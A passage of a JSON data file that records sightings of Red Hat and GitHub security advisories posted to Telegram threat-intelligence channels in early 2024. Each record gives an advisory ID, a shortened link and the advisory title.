"2024-02-11T07:56:42.000000Z"}, {"uuid": "81187809-364c-48ca-b379-29db035e201f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0675", "type": "seen", "source": "https://t.me/ctinow/179182", "content": "https://ift.tt/drz5XE8\nRHSA-2024:0675: Important: gimp security update", "creation_timestamp": "2024-02-05T13:17:25.000000Z"}, {"uuid": "0ff9925f-e20d-4b5b-a70b-49bb70d6fcae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34Q3-P352-C7Q8", "type": "seen", "source": "https://t.me/ctinow/178203", "content": "https://ift.tt/qIC5iuH\n[GHSA-34q3-p352-c7q8] Central Dogma Authentication Bypass Vulnerability via Session Leakage", "creation_timestamp": "2024-02-02T18:06:55.000000Z"}, {"uuid": "45906a6b-cbf2-42de-80de-6d7a3b1b8cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QFV2-3P2F-VG48", "type": "seen", "source": "https://t.me/ctinow/178202", "content": "https://ift.tt/Syf1Glg\n[GHSA-qfv2-3p2f-vg48] Duplicate Advisory: Central Dogma Authentication Bypass Vulnerability via Session Leakage", "creation_timestamp": "2024-02-02T18:06:53.000000Z"}, {"uuid": "6bd9dee9-93f3-4aac-a76d-1a51a8223182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0494", "type": "seen", "source": "https://t.me/ctinow/173496", "content": "https://ift.tt/GvLOlto\nRHSA-2024:0494: Important: Red Hat build of Quarkus 2.13.9.SP1 release and security update", "creation_timestamp": "2024-01-25T15:16:38.000000Z"}, {"uuid": "2f7d222f-b569-4afb-bc44-e9b2239b7329", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0495", "type": "seen", "source": "https://t.me/ctinow/173495", "content": "https://ift.tt/nObrVWk\nRHSA-2024:0495: Important: Red Hat build of Quarkus 3.2.9.SP1 release and security update", "creation_timestamp": "2024-01-25T15:16:37.000000Z"}, {"uuid": "1ce9d815-cd16-4fa3-8cce-377ba3742399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0740", "type": "seen", "source": "https://t.me/ctinow/179254", "content": "https://ift.tt/KEz9c56\nCVE-2019-18805 | Linux Kernel up to 5.0.10 sysctl_net_ipv4.c tcp_ack_update_rtt integer overflow (RHSA-2020:0740)", "creation_timestamp": "2024-02-05T15:21:31.000000Z"}, {"uuid": "0417c8c2-8ce4-4c07-af68-ec20a2e78b74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0626", "type": "seen", "source": "https://t.me/ctinow/176620", "content": "https://ift.tt/SOK7ATj\nRHSA-2024:0626: Important: tigervnc security update", "creation_timestamp": "2024-01-31T10:16:59.000000Z"}, {"uuid": "4e38e180-3496-485c-a808-36fe19558275", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0627", "type": "seen", "source": "https://t.me/ctinow/176619", "content": "https://ift.tt/D9goEHV\nRHSA-2024:0627: Moderate: gnutls security update", "creation_timestamp": "2024-01-31T10:16:58.000000Z"}, {"uuid": "a1881c18-8c27-4d9d-bfad-7ac784128967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0628", "type": "seen", "source": "https://t.me/ctinow/176618", "content": "https://ift.tt/IzHU5Bl\nRHSA-2024:0628: Moderate: libssh security update", "creation_timestamp": "2024-01-31T10:16:57.000000Z"}, {"uuid": "9c051ba1-dfa6-43cc-b696-909802a80a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QRQR-3X5J-2XW9", "type": "seen", "source": "https://t.me/ctinow/177222", "content": "https://ift.tt/RcGr1uv\n[GHSA-qrqr-3x5j-2xw9] Docker Moby Authentication Bypass", "creation_timestamp": "2024-02-01T00:36:14.000000Z"}, {"uuid": "28cab86a-0e77-44f0-b51d-fdccbe553734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6M72-467W-94RH", "type": "seen", "source": "https://t.me/ctinow/177216", "content": "https://ift.tt/aGTzSmW\n[GHSA-6m72-467w-94rh] Privilege Escalation in HashiCorp Consul", "creation_timestamp": "2024-02-01T00:26:26.000000Z"}, {"uuid": "b8b8b7ff-47c6-483b-82ad-f29e5d1543c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496G-FR33-WHRF", "type": "seen", "source": "https://t.me/ctinow/177215", "content": "https://ift.tt/304QPWf\n[GHSA-496g-fr33-whrf] Denial of service in HashiCorp Consul", "creation_timestamp": "2024-02-01T00:26:25.000000Z"}, {"uuid": "a3a7ee59-a916-4c5f-a6a9-d37b1fefdb63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P26-698R-W4HX", "type": "seen", "source": "https://t.me/ctinow/177198", "content": "https://ift.tt/WxLphyV\n[GHSA-9p26-698r-w4hx] BuildKit vulnerable to possible panic when incorrect parameters sent from frontend", "creation_timestamp": "2024-01-31T23:56:55.000000Z"}, {"uuid": "b6cdf6ed-7c35-4d2f-a4de-e6e91c71ec1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9H6G-PR28-7CQP", "type": "seen", "source": "https://t.me/ctinow/177197", "content": "https://ift.tt/GDtv0Xy\n[GHSA-9h6g-pr28-7cqp] nodemailer ReDoS when trying to send a specially crafted email", "creation_timestamp": "2024-01-31T23:56:53.000000Z"}, {"uuid": "0e45dfa9-16cb-4530-a33f-26eb29d06cfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XC9-XQ7W-VPCR", "type": "seen", "source": "https://t.me/ctinow/177196", "content": "https://ift.tt/xijwBym\n[GHSA-9xc9-xq7w-vpcr] Apache ServiceComb Service-Center Server-Side Request Forgery vulnerability", "creation_timestamp": "2024-01-31T23:56:52.000000Z"}, {"uuid": "633aeb9c-b1ae-4432-97c9-2cb88f398bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8XP-52MQ-RMM8", "type": "seen", "source": "https://t.me/ctinow/177195", "content": "https://ift.tt/mFPUdro\n[GHSA-r8xp-52mq-rmm8] Apache ServiceComb Service-Center Exposure of Sensitive Information to an Unauthorized Actor vulnerability", "creation_timestamp": "2024-01-31T23:56:51.000000Z"}, {"uuid": "6864dbe8-c759-48da-b454-bda42b4a36c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPXR-W9W7-G4GV", "type": "seen", "source": "https://t.me/ctinow/177194", "content": "https://ift.tt/UQmlOdW\n[GHSA-hpxr-w9w7-g4gv] stereoscope vulnerable to tar path traversal when processing OCI tar archives", "creation_timestamp": "2024-01-31T23:47:21.000000Z"}, {"uuid": "4a038075-a09f-47dc-b624-3af883f17547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0625", "type": "seen", "source": "https://t.me/ctinow/176621", "content": "https://ift.tt/1jSxc7m\nRHSA-2024:0625: Moderate: libssh security update", "creation_timestamp": "2024-01-31T10:17:00.000000Z"}, {"uuid": "ace0da9c-7ec2-4a35-8f24-b204d8bd1bed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5626-PW9C-HMJR", "type": "seen", "source": "https://t.me/ctinow/177009", "content": "https://ift.tt/iKIokaG\n[GHSA-5626-pw9c-hmjr] OctoPrint Unverified Password Change via Access Control Settings", "creation_timestamp": "2024-01-31T19:17:54.000000Z"}, {"uuid": "2d47ba40-705b-46db-b375-7967d8d48b2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P6RP-MX85-M459", "type": "seen", "source": "https://t.me/ctinow/177008", "content": "https://ift.tt/64a2SrO\n[GHSA-p6rp-mx85-m459] Spring Cloud Contract vulnerable to local information disclosure", "creation_timestamp": "2024-01-31T19:17:52.000000Z"}, {"uuid": "06a01fa5-9529-4606-8391-6ccd354ef3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29W6-C52G-M8JC", "type": "seen", "source": "https://t.me/ctinow/177007", "content": "https://ift.tt/BirTz8g\n[GHSA-29w6-c52g-m8jc] C5 Firefly III CSV Injection.", "creation_timestamp": "2024-01-31T19:17:51.000000Z"}, {"uuid": "56650f8a-84ac-48ea-821f-15ec89ac5cc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RR69-RXR6-8QWF", "type": "seen", "source": "https://t.me/ctinow/182151", "content": "https://ift.tt/I68pO7H\n[GHSA-rr69-rxr6-8qwf] serde-json-wasm stack overflow during recursive JSON parsing", "creation_timestamp": "2024-02-09T17:16:27.000000Z"}, {"uuid": "168c85e8-2988-4442-a619-2027e499abec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22R3-9W55-CJ54", "type": "seen", "source": "https://t.me/ctinow/182136", "content": "https://ift.tt/PJi5FBU\n[GHSA-22r3-9w55-cj54] Pkg Local Privilege Escalation", "creation_timestamp": "2024-02-09T16:36:49.000000Z"}, {"uuid": "a4b45d2c-4e60-4870-926d-d45a5e3b201a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-583G-G682-CRXF", "type": "seen", "source": "https://t.me/ctinow/182131", "content": "https://ift.tt/eKyPoMt\n[GHSA-583g-g682-crxf] Micronaut management endpoints vulnerable to drive-by localhost attack", "creation_timestamp": "2024-02-09T16:27:27.000000Z"}, {"uuid": "3b50afc2-3ef6-4422-8473-f92623f068f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0682", "type": "seen", "source": "https://t.me/ctinow/181612", "content": "https://ift.tt/7ziNjru\nRHSA-2024:0682: Important: OpenShift Container Platform 4.11.58 bug fix and security update", "creation_timestamp": "2024-02-08T20:22:00.000000Z"}, {"uuid": "a89a7d6a-b89f-4ac1-be2d-c170bff16a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0645", "type": "seen", "source": "https://t.me/ctinow/181611", "content": "https://ift.tt/VewU9Xx\nRHSA-2024:0645: Moderate: OpenShift Container Platform 4.14.11 packages and security update", "creation_timestamp": "2024-02-08T20:21:59.000000Z"}, {"uuid": "f2bca550-0ad1-4966-958f-4c84b95bed69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0662", "type": "seen", "source": "https://t.me/ctinow/181610", "content": "https://ift.tt/LvQd1cG\nRHSA-2024:0662: Moderate: OpenShift Container Platform 4.13.32 packages and security update", "creation_timestamp": "2024-02-08T20:21:58.000000Z"}, {"uuid": "65ea1aa5-f53b-4cbf-9d4c-bf83191bb173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0664", "type": "seen", "source": "https://t.me/ctinow/181720", "content": "https://ift.tt/yQTqYm4\nRHSA-2024:0664: Important: OpenShift Container Platform 4.12.49 bug fix update and security update", "creation_timestamp": "2024-02-09T00:16:36.000000Z"}, {"uuid": "3e5bb9e0-1e4b-45d2-922a-3920cab75fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0666", "type": "seen", "source": "https://t.me/ctinow/181719", "content": "https://ift.tt/NfBR04P\nRHSA-2024:0666: Moderate: OpenShift Container Platform 4.12.49 packages and security update", "creation_timestamp": "2024-02-09T00:16:35.000000Z"}, {"uuid": "2caea9bb-100c-425b-ab1f-8679efc029ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0764", "type": "seen", "source": "https://t.me/ctinow/181718", "content": "https://ift.tt/F8uvLEH\nRHSA-2024:0764: Important: container-tools:rhel8 security update", "creation_timestamp": "2024-02-09T00:16:33.000000Z"}, {"uuid": "9c728543-8cae-4638-a68e-8bbdf054f19c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C4CM-R9FH-JGJ9", "type": "seen", "source": "https://t.me/ctinow/182182", "content": "https://ift.tt/lpS9Aew\n[GHSA-c4cm-r9fh-jgj9] commonground-api-common unexploitable privilege escalation in JWT authentication middleware", "creation_timestamp": "2024-02-09T18:16:29.000000Z"}, {"uuid": "3b11d7da-83a0-42a5-ab00-5797942adbda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5J2-G63M-F8G4", "type": "seen", "source": "https://t.me/ctinow/182158", "content": "https://ift.tt/GT7pHmB\n[GHSA-x5j2-g63m-f8g4] pqc_kyber KyberSlash: division timings depending on secrets", "creation_timestamp": "2024-02-09T17:26:43.000000Z"}, {"uuid": "ff245896-9dec-4d29-ac09-7cfb7f5e5912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR8F-CJW7-838M", "type": "seen", "source": "https://t.me/ctinow/182217", "content": "https://ift.tt/KlC3GT7\n[GHSA-qr8f-cjw7-838m] Mattermost Jira Plugin does not properly check security levels", "creation_timestamp": "2024-02-09T19:27:05.000000Z"}, {"uuid": "f560e267-49df-4051-ac7b-7522a760f1d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4FP6-574P-FC35", "type": "seen", "source": "https://t.me/ctinow/182216", "content": "https://ift.tt/qxZA1fC\n[GHSA-4fp6-574p-fc35] Mattermost Jira Plugin vulnerable to Cross-Site Request Forgery", "creation_timestamp": "2024-02-09T19:27:04.000000Z"}, {"uuid": "ff8b2b13-3184-45cf-a70a-e2fc75eb9016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-259P-RVJX-FFWG", "type": "seen", "source": "https://t.me/ctinow/181578", "content": "https://ift.tt/zSX9Toa\n[GHSA-259p-rvjx-ffwg] Panel::Software Customized WiX .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", "creation_timestamp": "2024-02-08T19:31:58.000000Z"}, {"uuid": "3f3970a2-202d-4466-8220-bff7c8fb36b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8V28-3G86-CHJ5", "type": "seen", "source": "https://t.me/ctinow/181586", "content": "https://ift.tt/ErP1I0w\n[GHSA-8v28-3g86-chj5] PanelSwWix4.Sdk .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", "creation_timestamp": "2024-02-08T19:36:40.000000Z"}, {"uuid": "a1227886-bf4f-48bf-939c-37173ab977af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W275-M8CR-HF2V", "type": "seen", "source": "https://t.me/ctinow/181577", "content": "https://ift.tt/UxKF5tj\n[GHSA-w275-m8cr-hf2v] Liferay Portal denial-of-service vulnerability", "creation_timestamp": "2024-02-08T19:31:57.000000Z"}, {"uuid": "85f145cd-c1d1-4835-bbb2-27c2e61137bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WH2-WXC7-9PH5", "type": "seen", "source": "https://t.me/ctinow/181576", "content": "https://ift.tt/O5xYvJ9\n[GHSA-7wh2-wxc7-9ph5] WiX Toolset's .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", "creation_timestamp": "2024-02-08T19:31:56.000000Z"}, {"uuid": "9710d232-3643-46df-b02b-580398528f19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0757", "type": "seen", "source": "https://t.me/ctinow/181558", "content": "https://ift.tt/At1hRGb\nRHSA-2024:0757: Important: container-tools:4.0 security update", "creation_timestamp": "2024-02-08T19:22:03.000000Z"}, {"uuid": "3d0cbaf4-5254-47fd-bf0e-2b7649ec21b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0758", "type": "seen", "source": "https://t.me/ctinow/181557", "content": "https://ift.tt/wG8qxnR\nRHSA-2024:0758: Important: container-tools:2.0 security update", "creation_timestamp": "2024-02-08T19:22:02.000000Z"}, {"uuid": "775a8fca-82d7-43ec-ad3d-1293335423c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59J8-776V-XXXG", "type": "seen", "source": "https://t.me/ctinow/182111", "content": "https://ift.tt/nuw5e4m\n[GHSA-59j8-776v-xxxg] NoneBot Potential Information Leak in User-Constructed Message Templates", "creation_timestamp": "2024-02-09T16:16:24.000000Z"}, {"uuid": "27315f8c-1277-448f-8f76-76054f3ebd3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C866-8GPW-P3MV", "type": "seen", "source": "https://t.me/ctinow/182110", "content": "https://ift.tt/30EWTRt\n[GHSA-c866-8gpw-p3mv] HashiCorp Nomad vulnerable to symlink attacks", "creation_timestamp": "2024-02-09T16:16:23.000000Z"}, {"uuid": "2e8988c8-e921-428c-b718-aede467b76cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78XJ-CGH5-2H22", "type": "seen", "source": "https://t.me/ctinow/182109", "content": "https://ift.tt/tJCShuw\n[GHSA-78xj-cgh5-2h22] NPM IP package vulnerable to Server-Side Request Forgery (SSRF) attacks", "creation_timestamp": "2024-02-09T16:16:22.000000Z"}, {"uuid": "68323c1f-6517-4669-bd1a-844dacbba94b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PXQ-6XX9-XPGM", "type": "seen", "source": "https://t.me/ctinow/170890", "content": "https://ift.tt/Ri9CluT\nCVE-2023-52139 | Misskey prior 2023.12.1 improper authorization (GHSA-7pxq-6xx9-xpgm)", "creation_timestamp": "2024-01-21T17:46:04.000000Z"}, {"uuid": "7fccffa5-f0de-4cb8-af2f-8c9298c896fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CFPH-4QQH-W828", "type": "seen", "source": "https://t.me/ctinow/170836", "content": "https://ift.tt/EjlmaBg\nCVE-2023-7079 | Cloudflare wrangler up to 3.18.0 HTTP Request improper authentication (GHSA-cfph-4qqh-w828)", "creation_timestamp": "2024-01-21T14:14:22.000000Z"}, {"uuid": "c1188e2e-5545-4a50-a09f-c6bdc7f42d7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FWVG-2739-22V7", "type": "seen", "source": "https://t.me/ctinow/170831", "content": "https://ift.tt/zvO7luW\nCVE-2023-7078 | Cloudflare miniflare prior 3.20231030.2 HTTP Request server-side request forgery (GHSA-fwvg-2739-22v7)", "creation_timestamp": "2024-01-21T13:41:13.000000Z"}, {"uuid": "bace408e-d2d2-4d22-ba7d-237a19a747fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJPR-7W8C-GV3J", "type": "seen", "source": "https://t.me/ctinow/175781", "content": "https://ift.tt/tXIlscO\nCVE-2024-21637 | authentik up to 2023.8.5/2023.10.5 OpenID Connect Flow cross site scripting (GHSA-rjpr-7w8c-gv3j)", "creation_timestamp": "2024-01-30T09:41:38.000000Z"}, {"uuid": "d9ed5c28-0b29-4717-991f-ee9c770f3b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHCR-X7HC-8FP8", "type": "seen", "source": "https://t.me/ctinow/176116", "content": "https://ift.tt/awkz8Ms\nCVE-2024-0227 | devise-two-factor excessive authentication (GHSA-chcr-x7hc-8fp8)", "creation_timestamp": "2024-01-30T17:47:06.000000Z"}, {"uuid": "3f79374b-da73-4992-8da0-d8b2136e9c79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0533", "type": "seen", "source": "https://t.me/ctinow/175048", "content": "https://ift.tt/BC4aSZw\nRHSA-2024:0533: Moderate: gnutls security update", "creation_timestamp": "2024-01-29T03:16:43.000000Z"}, {"uuid": "42e9012c-6583-4479-8fe0-a266720aa309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59QJ-JCJV-662J", "type": "seen", "source": "https://t.me/ctinow/181471", "content": "https://ift.tt/VBqygoM\n[GHSA-59qj-jcjv-662j] DIRAC's TokenManager does not check permissions on cached tokens", "creation_timestamp": "2024-02-08T16:46:51.000000Z"}, {"uuid": "92e145fd-d3f3-4536-bedd-a876383f3978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7C6P-848J-WH5H", "type": "seen", "source": "https://t.me/ctinow/181456", "content": "https://ift.tt/CYejXvy\n[GHSA-7c6p-848j-wh5h] Composer code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php", "creation_timestamp": "2024-02-08T16:17:04.000000Z"}, {"uuid": "dabcf6bf-2c9b-4a4a-b7be-5a12ed97bad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27WG-99G8-2V4V", "type": "seen", "source": "https://t.me/ctinow/171785", "content": "https://ift.tt/56scvZS\nCVE-2024-21629 | rust-ethereum EVM up to 0.41.0 record_external_operation unknown vulnerability (GHSA-27wg-99g8-2v4v)", "creation_timestamp": "2024-01-23T09:21:30.000000Z"}, {"uuid": "62b74054-5955-43ff-8f4d-5c11a5ab4754", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR7M-R9VM-M4WF", "type": "seen", "source": "https://t.me/ctinow/171831", "content": "https://ift.tt/1cverQ5\nCVE-2024-21628 | PrestaShop up to 8.1.2 Form isCleanHtml cross site scripting (GHSA-vr7m-r9vm-m4wf)", "creation_timestamp": "2024-01-23T10:26:57.000000Z"}, {"uuid": "fe7f3454-d394-431b-b0cd-3ed5ac17202e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5G66-628F-7CVJ", "type": "seen", "source": "https://t.me/ctinow/171784", "content": "https://ift.tt/FJQfVkb\nCVE-2024-21632 | synth omniauth-microsoft_graph up to 1.x email improper authentication (GHSA-5g66-628f-7cvj)", "creation_timestamp": "2024-01-23T09:21:29.000000Z"}, {"uuid": "829dbebb-5789-4c2f-b23c-6a31e07df119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0573", "type": "seen", "source": "https://t.me/ctinow/175925", "content": "https://ift.tt/6I27PCJ\nRHSA-2024:0573: Moderate: libfastjson security update", "creation_timestamp": "2024-01-30T14:21:47.000000Z"}, {"uuid": "df7cbc00-4370-45aa-9716-5f95a059b436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2022:7967", "type": "seen", "source": "https://t.me/cibsecurity/70412", "content": "\u203c CVE-2023-2680 \u203c\n\nThis CVE exists because of an incomplete fix for CVE-2021-3750. More specifically, the qemu-kvm package as released for Red Hat Enterprise Linux 9.1 via RHSA-2022:7967 included a version of qemu-kvm that was actually missing the fix for CVE-2021-3750.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-13T20:24:02.000000Z"}, {"uuid": "ec5d5705-d97a-44af-9211-b9ef20541764", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0670", "type": "seen", "source": "https://t.me/ctinow/178288", "content": "https://ift.tt/2lBHv4h\nRHSA-2024:0670: Important: runc security update", "creation_timestamp": "2024-02-02T22:16:46.000000Z"}, {"uuid": "22a5f8b6-b465-49af-97c6-8b56e2889b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-82VX-MM6R-GG8W", "type": "seen", "source": "https://t.me/ctinow/177833", "content": "https://ift.tt/Rnbpr3j\n[GHSA-82vx-mm6r-gg8w] Bref vulnerable to Body Parsing Inconsistency in Event-Driven Functions", "creation_timestamp": "2024-02-01T23:51:28.000000Z"}, {"uuid": "f6a8371e-e0d9-4ee4-9c0a-339cc40a008f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V5GQ-QVJQ-8P53", "type": "seen", "source": "https://t.me/ctinow/177223", "content": "https://ift.tt/HwbS7CF\n[GHSA-v5gq-qvjq-8p53] Grafana Cross-site Scripting (XSS)", "creation_timestamp": "2024-02-01T00:36:15.000000Z"}, {"uuid": "7b647351-4ec8-4287-bb1e-60cd46c1b72a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQ95-XF66-J689", "type": "seen", "source": "https://t.me/ctinow/177221", "content": "https://ift.tt/Qvz9WnS\n[GHSA-rq95-xf66-j689] Improper Authentication in HashiCorp Vault", "creation_timestamp": "2024-02-01T00:36:13.000000Z"}, {"uuid": 